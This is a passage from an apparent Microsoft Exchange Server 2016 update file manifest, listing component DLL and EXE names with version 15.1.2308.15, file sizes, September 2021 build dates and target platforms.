\nMicrosoft.exchange.data.directory.eventlog.dll| 15.1.2308.15| 80,272| 25-Sep-21| 7:04| x64| \nMicrosoft.exchange.data.dll| 15.1.2308.15| 1,964,416| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.data.groupmailboxaccesslayer.dll| 15.1.2308.15| 1,626,488| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.data.ha.dll| 15.1.2308.15| 364,432| 25-Sep-21| 7:00| x86| \nMicrosoft.exchange.data.imageanalysis.dll| 15.1.2308.15| 105,360| 25-Sep-21| 7:02| x86| \nMicrosoft.exchange.data.mailboxfeatures.dll| 15.1.2308.15| 15,760| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.data.mailboxloadbalance.dll| 15.1.2308.15| 224,656| 25-Sep-21| 7:02| x86| \nMicrosoft.exchange.data.mapi.dll| 15.1.2308.15| 186,760| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.data.metering.contracts.dll| 15.1.2308.15| 39,816| 25-Sep-21| 7:00| x86| \nMicrosoft.exchange.data.metering.dll| 15.1.2308.15| 119,184| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.data.msosyncxsd.dll| 15.1.2308.15| 968,080| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.data.notification.dll| 15.1.2308.15| 141,192| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.data.personaldataplatform.dll| 15.1.2308.15| 769,400| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.data.providers.dll| 15.1.2308.15| 139,664| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.data.provisioning.dll| 15.1.2308.15| 56,712| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.data.rightsmanagement.dll| 15.1.2308.15| 453,008| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.data.scheduledtimers.dll| 15.1.2308.15| 32,656| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.data.storage.clientstrings.dll| 15.1.2308.15| 256,392| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.data.storage.dll| 15.1.2308.15| #########| 25-Sep-21| 7:00| x86| \nMicrosoft.exchange.data.storage.eventlog.dll| 15.1.2308.15| 37,760| 25-Sep-21| 7:03| x64| \nMicrosoft.exchange.data.storageconfigurationresources.dll| 15.1.2308.15| 655,752| 25-Sep-21| 7:00| x86| \nMicrosoft.exchange.data.storeobjects.dll| 15.1.2308.15| 174,472| 25-Sep-21| 7:00| x86| \nMicrosoft.exchange.data.throttlingservice.client.dll| 15.1.2308.15| 36,232| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.data.throttlingservice.client.eventlog.dll| 15.1.2308.15| 14,208| 25-Sep-21| 7:00| x64| \nMicrosoft.exchange.data.throttlingservice.eventlog.dll| 15.1.2308.15| 14,216| 25-Sep-21| 7:03| x64| \nMicrosoft.exchange.datacenter.management.activemonitoring.recoveryservice.eventlog.dll| 15.1.2308.15| 14,712| 25-Sep-21| 7:03| x64| \nMicrosoft.exchange.datacenterstrings.dll| 15.1.2308.15| 72,592| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.delivery.eventlog.dll| 15.1.2308.15| 13,192| 25-Sep-21| 7:03| x64| \nMicrosoft.exchange.diagnostics.certificatelogger.dll| 15.1.2308.15| 22,920| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.diagnostics.dll| 15.1.2308.15| 1,813,384| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.diagnostics.dll.deploy| 15.1.2308.15| 1,813,384| 25-Sep-21| 7:03| Not applicable| \nMicrosoft.exchange.diagnostics.performancelogger.dll| 15.1.2308.15| 23,944| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.diagnostics.service.common.dll| 15.1.2308.15| 546,704| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.diagnostics.service.eventlog.dll| 15.1.2308.15| 215,432| 25-Sep-21| 7:00| x64| \nMicrosoft.exchange.diagnostics.service.exchangejobs.dll| 15.1.2308.15| 193,424| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.diagnostics.service.exe| 15.1.2308.15| 146,320| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.diagnostics.service.fuseboxperfcounters.dll| 15.1.2308.15| 27,536| 25-Sep-21| 7:00| x86| \nMicrosoft.exchange.diagnosticsaggregation.eventlog.dll| 15.1.2308.15| 13,704| 25-Sep-21| 7:03| x64| \nMicrosoft.exchange.diagnosticsaggregationservicelet.dll| 15.1.2308.15| 49,528| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.directory.topologyservice.eventlog.dll| 15.1.2308.15| 28,040| 25-Sep-21| 7:05| x64| \nMicrosoft.exchange.directory.topologyservice.exe| 15.1.2308.15| 208,784| 25-Sep-21| 7:02| x86| \nMicrosoft.exchange.disklocker.events.dll| 15.1.2308.15| 88,968| 25-Sep-21| 7:01| x64| \nMicrosoft.exchange.disklocker.interop.dll| 15.1.2308.15| 32,648| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.drumtesting.calendarmigration.dll| 15.1.2308.15| 45,960| 25-Sep-21| 7:02| x86| \nMicrosoft.exchange.drumtesting.common.dll| 15.1.2308.15| 18,824| 25-Sep-21| 7:00| x86| \nMicrosoft.exchange.dxstore.dll| 15.1.2308.15| 473,480| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.dxstore.ha.events.dll| 15.1.2308.15| 206,224| 25-Sep-21| 7:01| x64| \nMicrosoft.exchange.dxstore.ha.instance.exe| 15.1.2308.15| 36,752| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.eac.flighting.dll| 15.1.2308.15| 131,448| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.edgecredentialsvc.exe| 15.1.2308.15| 21,896| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.edgesync.common.dll| 15.1.2308.15| 148,368| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.edgesync.datacenterproviders.dll| 15.1.2308.15| 220,024| 25-Sep-21| 7:00| x86| \nMicrosoft.exchange.edgesync.eventlog.dll| 15.1.2308.15| 23,936| 25-Sep-21| 7:03| x64| \nMicrosoft.exchange.edgesyncsvc.exe| 15.1.2308.15| 97,672| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.ediscovery.export.dll| 15.1.2308.15| 1,266,568| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.ediscovery.export.dll.deploy| 15.1.2308.15| 1,266,568| 25-Sep-21| 7:01| Not applicable| \nMicrosoft.exchange.ediscovery.exporttool.application| Not applicable| 16,490| 25-Sep-21| 7:03| Not applicable| \nMicrosoft.exchange.ediscovery.exporttool.exe.deploy| 15.1.2308.15| 87,416| 25-Sep-21| 7:01| Not applicable| \nMicrosoft.exchange.ediscovery.exporttool.manifest| Not applicable| 67,475| 25-Sep-21| 7:03| Not applicable| \nMicrosoft.exchange.ediscovery.exporttool.strings.dll.deploy| 15.1.2308.15| 52,112| 25-Sep-21| 7:03| Not applicable| \nMicrosoft.exchange.ediscovery.mailboxsearch.dll| 15.1.2308.15| 294,288| 25-Sep-21| 7:02| x86| \nMicrosoft.exchange.entities.birthdaycalendar.dll| 15.1.2308.15| 73,104| 25-Sep-21| 7:00| x86| \nMicrosoft.exchange.entities.booking.defaultservicesettings.dll| 15.1.2308.15| 45,968| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.entities.booking.dll| 15.1.2308.15| 218,512| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.entities.booking.management.dll| 15.1.2308.15| 78,200| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.entities.bookings.dll| 15.1.2308.15| 35,704| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.entities.calendaring.dll| 15.1.2308.15| 932,216| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.entities.common.dll| 15.1.2308.15| 336,256| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.entities.connectors.dll| 15.1.2308.15| 52,616| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.entities.contentsubmissions.dll| 15.1.2308.15| 32,136| 25-Sep-21| 7:02| x86| \nMicrosoft.exchange.entities.context.dll| 15.1.2308.15| 60,808| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.entities.datamodel.dll| 15.1.2308.15| 854,408| 25-Sep-21| 7:02| x86| \nMicrosoft.exchange.entities.fileproviders.dll| 15.1.2308.15| 291,704| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.entities.foldersharing.dll| 15.1.2308.15| 39,312| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.entities.holidaycalendars.dll| 15.1.2308.15| 76,168| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.entities.insights.dll| 15.1.2308.15| 166,776| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.entities.meetinglocation.dll| 15.1.2308.15| 1,486,736| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.entities.meetingparticipants.dll| 15.1.2308.15| 122,248| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.entities.meetingtimecandidates.dll| 15.1.2308.15| #########| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.entities.onlinemeetings.dll| 15.1.2308.15| 264,072| 25-Sep-21| 7:00| x86| \nMicrosoft.exchange.entities.people.dll| 15.1.2308.15| 37,768| 25-Sep-21| 7:02| x86| \nMicrosoft.exchange.entities.peopleinsights.dll| 15.1.2308.15| 186,744| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.entities.reminders.dll| 15.1.2308.15| 64,376| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.entities.schedules.dll| 15.1.2308.15| 83,856| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.entities.shellservice.dll| 15.1.2308.15| 63,888| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.entities.tasks.dll| 15.1.2308.15| 100,240| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.entities.xrm.dll| 15.1.2308.15| 144,784| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.entityextraction.calendar.dll| 15.1.2308.15| 270,224| 25-Sep-21| 7:00| x86| \nMicrosoft.exchange.eserepl.common.dll| 15.1.2308.15| 15,248| 25-Sep-21| 7:00| x86| \nMicrosoft.exchange.eserepl.configuration.dll| 15.1.2308.15| 15,736| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.eserepl.dll| 15.1.2308.15| 131,960| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.ews.configuration.dll| 15.1.2308.15| 254,352| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.exchangecertificate.eventlog.dll| 15.1.2308.15| 13,192| 25-Sep-21| 7:05| x64| \nMicrosoft.exchange.exchangecertificateservicelet.dll| 15.1.2308.15| 37,264| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.extensibility.internal.dll| 15.1.2308.15| 640,888| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.extensibility.partner.dll| 15.1.2308.15| 37,240| 25-Sep-21| 7:00| x86| \nMicrosoft.exchange.federateddirectory.dll| 15.1.2308.15| 146,312| 25-Sep-21| 7:02| x86| \nMicrosoft.exchange.ffosynclogmsg.dll| 15.1.2308.15| 13,192| 25-Sep-21| 7:01| x64| \nMicrosoft.exchange.frontendhttpproxy.dll| 15.1.2308.15| 594,320| 25-Sep-21| 7:04| x86| \nMicrosoft.exchange.frontendhttpproxy.eventlogs.dll| 15.1.2308.15| 14,712| 25-Sep-21| 7:03| x64| \nMicrosoft.exchange.frontendtransport.monitoring.dll| 15.1.2308.15| 30,096| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.griffin.variantconfiguration.dll| 15.1.2308.15| 99,728| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.hathirdpartyreplication.dll| 15.1.2308.15| 42,376| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.helpprovider.dll| 15.1.2308.15| 40,312| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.httpproxy.addressfinder.dll| 15.1.2308.15| 54,160| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.httpproxy.common.dll| 15.1.2308.15| 163,712| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.httpproxy.diagnostics.dll| 15.1.2308.15| 58,768| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.httpproxy.flighting.dll| 15.1.2308.15| 204,688| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.httpproxy.passivemonitor.dll| 15.1.2308.15| 17,784| 25-Sep-21| 7:00| x86| \nMicrosoft.exchange.httpproxy.proxyassistant.dll| 15.1.2308.15| 30,608| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.httpproxy.routerefresher.dll| 15.1.2308.15| 38,792| 25-Sep-21| 7:04| x86| \nMicrosoft.exchange.httpproxy.routeselector.dll| 15.1.2308.15| 48,528| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.httpproxy.routing.dll| 15.1.2308.15| 180,624| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.httpredirectmodules.dll| 15.1.2308.15| 36,728| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.httprequestfiltering.dll| 15.1.2308.15| 28,040| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.httputilities.dll| 15.1.2308.15| 26,000| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.hygiene.data.dll| 15.1.2308.15| 1,868,152| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.hygiene.diagnosisutil.dll| 15.1.2308.15| 54,672| 25-Sep-21| 7:00| x86| \nMicrosoft.exchange.hygiene.eopinstantprovisioning.dll| 15.1.2308.15| 35,704| 25-Sep-21| 7:02| x86| \nMicrosoft.exchange.idserialization.dll| 15.1.2308.15| 35,720| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.imap4.eventlog.dll| 15.1.2308.15| 18,312| 25-Sep-21| 7:03| x64| \nMicrosoft.exchange.imap4.eventlog.dll.fe| 15.1.2308.15| 18,312| 25-Sep-21| 7:03| Not applicable| \nMicrosoft.exchange.imap4.exe| 15.1.2308.15| 263,056| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.imap4.exe.fe| 15.1.2308.15| 263,056| 25-Sep-21| 7:03| Not applicable| \nMicrosoft.exchange.imap4service.exe| 15.1.2308.15| 24,976| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.imap4service.exe.fe| 15.1.2308.15| 24,976| 25-Sep-21| 7:03| Not applicable| \nMicrosoft.exchange.imapconfiguration.dl1| 15.1.2308.15| 53,136| 25-Sep-21| 7:00| Not applicable| \nMicrosoft.exchange.inference.common.dll| 15.1.2308.15| 216,976| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.inference.hashtagsrelevance.dll| 15.1.2308.15| 32,120| 25-Sep-21| 7:01| x64| \nMicrosoft.exchange.inference.peoplerelevance.dll| 15.1.2308.15| 282,000| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.inference.ranking.dll| 15.1.2308.15| 18,832| 25-Sep-21| 7:02| x86| \nMicrosoft.exchange.inference.safetylibrary.dll| 15.1.2308.15| 83,848| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.inference.service.eventlog.dll| 15.1.2308.15| 15,248| 25-Sep-21| 7:06| x64| \nMicrosoft.exchange.infoworker.assistantsclientresources.dll| 15.1.2308.15| 94,088| 25-Sep-21| 7:00| x86| \nMicrosoft.exchange.infoworker.common.dll| 15.1.2308.15| 1,841,040| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.infoworker.eventlog.dll| 15.1.2308.15| 71,560| 25-Sep-21| 7:06| x64| \nMicrosoft.exchange.infoworker.meetingvalidator.dll| 15.1.2308.15| 175,488| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.instantmessaging.dll| 15.1.2308.15| 45,968| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.irm.formprotector.dll| 15.1.2308.15| 159,624| 25-Sep-21| 7:01| x64| \nMicrosoft.exchange.irm.msoprotector.dll| 15.1.2308.15| 51,080| 25-Sep-21| 7:01| x64| \nMicrosoft.exchange.irm.ofcprotector.dll| 15.1.2308.15| 45,960| 25-Sep-21| 7:01| x64| \nMicrosoft.exchange.isam.databasemanager.dll| 15.1.2308.15| 30,608| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.isam.esebcli.dll| 15.1.2308.15| 100,240| 25-Sep-21| 7:01| x64| \nMicrosoft.exchange.jobqueue.eventlog.dll| 15.1.2308.15| 13,200| 25-Sep-21| 7:03| x64| \nMicrosoft.exchange.jobqueueservicelet.dll| 15.1.2308.15| 271,224| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.killswitch.dll| 15.1.2308.15| 22,408| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.killswitchconfiguration.dll| 15.1.2308.15| 33,680| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.loganalyzer.analyzers.auditing.dll| 15.1.2308.15| 18,320| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.loganalyzer.analyzers.certificatelog.dll| 15.1.2308.15| 15,240| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.loganalyzer.analyzers.cmdletinfralog.dll| 15.1.2308.15| 27,536| 25-Sep-21| 7:00| x86| \nMicrosoft.exchange.loganalyzer.analyzers.easlog.dll| 15.1.2308.15| 30,608| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.loganalyzer.analyzers.ecplog.dll| 15.1.2308.15| 22,392| 25-Sep-21| 7:00| x86| \nMicrosoft.exchange.loganalyzer.analyzers.eventlog.dll| 15.1.2308.15| 66,448| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.loganalyzer.analyzers.ewslog.dll| 15.1.2308.15| 29,584| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.loganalyzer.analyzers.griffinperfcounter.dll| 15.1.2308.15| 19,856| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.loganalyzer.analyzers.groupescalationlog.dll| 15.1.2308.15| 20,360| 25-Sep-21| 7:02| x86| \nMicrosoft.exchange.loganalyzer.analyzers.httpproxylog.dll| 15.1.2308.15| 19,344| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.loganalyzer.analyzers.hxservicelog.dll| 15.1.2308.15| 34,184| 25-Sep-21| 7:02| x86| \nMicrosoft.exchange.loganalyzer.analyzers.iislog.dll| 15.1.2308.15| 103,800| 25-Sep-21| 7:00| x86| \nMicrosoft.exchange.loganalyzer.analyzers.lameventlog.dll| 15.1.2308.15| 31,608| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.loganalyzer.analyzers.migrationlog.dll| 15.1.2308.15| 15,736| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.loganalyzer.analyzers.oabdownloadlog.dll| 15.1.2308.15| 20,872| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.loganalyzer.analyzers.oauthcafelog.dll| 15.1.2308.15| 16,272| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.loganalyzer.analyzers.outlookservicelog.dll| 15.1.2308.15| 49,040| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.loganalyzer.analyzers.owaclientlog.dll| 15.1.2308.15| 44,432| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.loganalyzer.analyzers.owalog.dll| 15.1.2308.15| 38,288| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.loganalyzer.analyzers.perflog.dll| 15.1.2308.15| #########| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.loganalyzer.analyzers.pfassistantlog.dll| 15.1.2308.15| 29,064| 25-Sep-21| 7:02| x86| \nMicrosoft.exchange.loganalyzer.analyzers.rca.dll| 15.1.2308.15| 21,392| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.loganalyzer.analyzers.restlog.dll| 15.1.2308.15| 24,440| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.loganalyzer.analyzers.store.dll| 15.1.2308.15| 15,224| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.loganalyzer.analyzers.transportsynchealthlog.dll| 15.1.2308.15| 21,896| 25-Sep-21| 7:02| x86| \nMicrosoft.exchange.loganalyzer.core.dll| 15.1.2308.15| 89,488| 25-Sep-21| 7:00| x86| \nMicrosoft.exchange.loganalyzer.extensions.auditing.dll| 15.1.2308.15| 20,880| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.loganalyzer.extensions.certificatelog.dll| 15.1.2308.15| 26,512| 25-Sep-21| 7:00| x86| \nMicrosoft.exchange.loganalyzer.extensions.cmdletinfralog.dll| 15.1.2308.15| 21,392| 25-Sep-21| 7:02| x86| \nMicrosoft.exchange.loganalyzer.extensions.common.dll| 15.1.2308.15| 28,048| 25-Sep-21| 7:00| x86| \nMicrosoft.exchange.loganalyzer.extensions.easlog.dll| 15.1.2308.15| 28,536| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.loganalyzer.extensions.errordetection.dll| 15.1.2308.15| 36,216| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.loganalyzer.extensions.ewslog.dll| 15.1.2308.15| 16,784| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.loganalyzer.extensions.griffinperfcounter.dll| 15.1.2308.15| 19,832| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.loganalyzer.extensions.groupescalationlog.dll| 15.1.2308.15| 15,248| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.loganalyzer.extensions.httpproxylog.dll| 15.1.2308.15| 17,296| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.loganalyzer.extensions.hxservicelog.dll| 15.1.2308.15| 19,856| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.loganalyzer.extensions.iislog.dll| 15.1.2308.15| 57,224| 25-Sep-21| 7:02| x86| \nMicrosoft.exchange.loganalyzer.extensions.migrationlog.dll| 15.1.2308.15| 17,808| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.loganalyzer.extensions.oabdownloadlog.dll| 15.1.2308.15| 18,824| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.loganalyzer.extensions.oauthcafelog.dll| 15.1.2308.15| 16,248| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.loganalyzer.extensions.outlookservicelog.dll| 15.1.2308.15| 17,808| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.loganalyzer.extensions.owaclientlog.dll| 15.1.2308.15| 15,248| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.loganalyzer.extensions.owalog.dll| 15.1.2308.15| 15,224| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.loganalyzer.extensions.perflog.dll| 15.1.2308.15| 52,616| 25-Sep-21| 7:00| x86| \nMicrosoft.exchange.loganalyzer.extensions.pfassistantlog.dll| 15.1.2308.15| 18,320| 25-Sep-21| 7:00| x86| \nMicrosoft.exchange.loganalyzer.extensions.rca.dll| 15.1.2308.15| 34,192| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.loganalyzer.extensions.restlog.dll| 15.1.2308.15| 17,288| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.loganalyzer.extensions.store.dll| 15.1.2308.15| 18,808| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.loganalyzer.extensions.transportsynchealthlog.dll| 15.1.2308.15| 43,408| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.loguploader.dll| 15.1.2308.15| 165,248| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.loguploaderproxy.dll| 15.1.2308.15| 54,672| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.mailboxassistants.assistants.dll| 15.1.2308.15| 9,063,296| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.mailboxassistants.attachmentthumbnail.dll| 15.1.2308.15| 33,144| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.mailboxassistants.common.dll| 15.1.2308.15| 124,280| 25-Sep-21| 7:00| x86| \nMicrosoft.exchange.mailboxassistants.crimsonevents.dll| 15.1.2308.15| 82,808| 25-Sep-21| 7:03| x64| \nMicrosoft.exchange.mailboxassistants.eventlog.dll| 15.1.2308.15| 14,200| 25-Sep-21| 7:03| x64| \nMicrosoft.exchange.mailboxassistants.rightsmanagement.dll| 15.1.2308.15| 30,088| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.mailboxloadbalance.dll| 15.1.2308.15| 661,384| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.mailboxloadbalance.serverstrings.dll| 15.1.2308.15| 63,376| 25-Sep-21| 7:00| x86| \nMicrosoft.exchange.mailboxreplicationservice.calendarsyncprovider.dll| 15.1.2308.15| 175,496| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.mailboxreplicationservice.common.dll| 15.1.2308.15| 2,785,656| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.mailboxreplicationservice.complianceprovider.dll| 15.1.2308.15| 53,112| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.mailboxreplicationservice.contactsyncprovider.dll| 15.1.2308.15| 151,944| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.mailboxreplicationservice.dll| 15.1.2308.15| 966,536| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.mailboxreplicationservice.easprovider.dll| 15.1.2308.15| 185,224| 25-Sep-21| 7:02| x86| \nMicrosoft.exchange.mailboxreplicationservice.eventlog.dll| 15.1.2308.15| 31,624| 25-Sep-21| 7:06| x64| \nMicrosoft.exchange.mailboxreplicationservice.googledocprovider.dll| 15.1.2308.15| 39,816| 25-Sep-21| 7:02| x86| \nMicrosoft.exchange.mailboxreplicationservice.imapprovider.dll| 15.1.2308.15| 105,848| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.mailboxreplicationservice.mapiprovider.dll| 15.1.2308.15| 94,600| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.mailboxreplicationservice.popprovider.dll| 15.1.2308.15| 43,384| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.mailboxreplicationservice.proxyclient.dll| 15.1.2308.15| 18,832| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.mailboxreplicationservice.proxyservice.dll| 15.1.2308.15| 172,920| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.mailboxreplicationservice.pstprovider.dll| 15.1.2308.15| 102,784| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.mailboxreplicationservice.remoteprovider.dll| 15.1.2308.15| 98,680| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.mailboxreplicationservice.storageprovider.dll| 15.1.2308.15| 188,296| 25-Sep-21| 7:00| x86| \nMicrosoft.exchange.mailboxreplicationservice.syncprovider.dll| 15.1.2308.15| 43,408| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.mailboxreplicationservice.xml.dll| 15.1.2308.15| 447,376| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.mailboxreplicationservice.xrmprovider.dll| 15.1.2308.15| 89,976| 25-Sep-21| 7:02| x86| \nMicrosoft.exchange.mailboxtransport.monitoring.dll| 15.1.2308.15| 107,920| 25-Sep-21| 7:00| x86| \nMicrosoft.exchange.mailboxtransport.storedriveragents.dll| 15.1.2308.15| 371,064| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.mailboxtransport.storedrivercommon.dll| 15.1.2308.15| 193,928| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.mailboxtransport.storedriverdelivery.dll| 15.1.2308.15| 551,800| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.mailboxtransport.storedriverdelivery.eventlog.dll| 15.1.2308.15| 16,264| 25-Sep-21| 7:03| x64| \nMicrosoft.exchange.mailboxtransport.submission.eventlog.dll| 15.1.2308.15| 15,752| 25-Sep-21| 7:03| x64| \nMicrosoft.exchange.mailboxtransport.submission.storedriversubmission.dll| 15.1.2308.15| 321,416| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.mailboxtransport.submission.storedriversubmission.eventlog.dll| 15.1.2308.15| 17,800| 25-Sep-21| 7:03| x64| \nMicrosoft.exchange.mailboxtransport.syncdelivery.dll| 15.1.2308.15| 45,448| 25-Sep-21| 7:00| x86| \nMicrosoft.exchange.mailboxtransportwatchdogservicelet.dll| 15.1.2308.15| 18,304| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.mailboxtransportwatchdogservicelet.eventlog.dll| 15.1.2308.15| 12,680| 25-Sep-21| 7:03| x64| \nMicrosoft.exchange.managedlexruntime.mppgruntime.dll| 15.1.2308.15| 20,880| 25-Sep-21| 7:00| x86| \nMicrosoft.exchange.management.activedirectory.dll| 15.1.2308.15| 415,120| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.management.classificationdefinitions.dll| 15.1.2308.15| 1,269,640| 25-Sep-21| 7:00| x86| \nMicrosoft.exchange.management.compliancepolicy.dll| 15.1.2308.15| 41,848| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.management.controlpanel.basics.dll| 15.1.2308.15| 433,536| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.management.controlpanel.dll| 15.1.2308.15| 4,563,344| 25-Sep-21| 7:00| x86| \nMicrosoft.exchange.management.controlpanel.owaoptionstrings.dll| 15.1.2308.15| 261,008| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.management.controlpanelmsg.dll| 15.1.2308.15| 33,672| 25-Sep-21| 7:01| x64| \nMicrosoft.exchange.management.deployment.analysis.dll| 15.1.2308.15| 94,088| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.management.deployment.dll| 15.1.2308.15| 591,248| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.management.deployment.xml.dll| 15.1.2308.15| 3,560,840| 25-Sep-21| 7:03| 